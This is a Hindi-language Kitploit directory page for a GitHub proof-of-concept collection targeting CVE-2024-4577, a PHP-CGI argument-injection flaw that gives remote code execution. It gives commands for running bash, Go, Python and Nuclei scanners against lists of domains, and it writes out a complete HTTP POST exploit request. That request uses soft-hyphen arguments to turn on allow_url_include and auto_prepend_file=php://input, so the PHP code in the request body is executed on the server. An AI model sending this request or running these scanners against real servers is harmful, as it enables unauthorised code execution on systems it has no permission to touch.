Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577-PHP-RCE — PHP RCE PoC CVE-2024-4577 के लिए bash, go, python और एक nuclei template में लिखा गया है | Kitploit
उपकरण/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PHP RCE PoC CVE-2024-4577 के लिए bash, go, python और एक nuclei template में लिखा गया है

रिपॉजिटरी देखें
331321 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP RCE प्रमाण-अवधारणा

CVE-2024-4577: PHP-CGI में तर्क इंजेक्शन

अवलोकन

यह रिपॉजिटरी CVE-2024-4577 कमजोरी की जांच के लिए स्क्रिप्ट्स रखती है, जो PHP-CGI में एक तर्क इंजेक्शन समस्या है। आप इस कमजोरी के लिए डोमेन की सूची का परीक्षण करने के लिए दी गई Bash, Go, और Python स्क्रिप्ट्स का उपयोग कर सकते हैं। मैंने एक Nuclei YAML फ़ाइल भी जारी की है।

उपयोग

Bash स्क्रिप्ट

Bash स्क्रिप्ट का उपयोग करने के लिए, निम्न कमांड चलाएँ:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

Go स्क्रिप्ट

पहले, Go स्क्रिप्ट को CVE-2024-4577.go नामक फ़ाइल में सहेजें। Go स्क्रिप्ट को बनाने और चलाने के लिए:

  1. Go स्क्रिप्ट को बाइनरी में संकलित करें:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • बाइनरी को डोमेन सूची फ़ाइल के तर्क के साथ निष्पादित करें:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • Python स्क्रिप्ट

    पहले, Python स्क्रिप्ट को CVE-2024-4577.py नामक फ़ाइल में सहेजें। Python स्क्रिप्ट को चलाने के लिए:

    1. सुनिश्चित करें कि आपके पास requests लाइब्रेरी स्थापित है:

      root@kitploit:~
      pip install requests
      
    2. Python स्क्रिप्ट को डोमेन सूची फ़ाइल के तर्क के साथ निष्पादित करें:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (वैकल्पिक) यदि आप केवल कमजोर होस्ट प्रिंट करना चाहते हैं:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    प्रमाण-अवधारणा (POC) की व्याख्या

    मैन्युअल रूप से कमजोरी का परीक्षण करने के लिए, आप निम्न POST अनुरोध भेज सकते हैं:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Nuclei टेम्पलेट

    मैंने कमजोर उदाहरणों को स्कैन करने के लिए एक Nuclei टेम्पलेट भी बनाया है, यह v3 लेआउट योजना का उपयोग करता है और प्रयोगशाला वातावरण में परीक्षण किया गया है:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    डोमेन सूची उदाहरण

    डोमेन की सूची में http/https जोड़ा जाना चाहिए ताकि वे सही ढंग से पढ़े जाएं।

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    उदाहरण आउटपुट

    यदि कोई डोमेन कमजोर पाया जाता है, तो आउटपुट होगा:

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    टूल डाउनलोड करें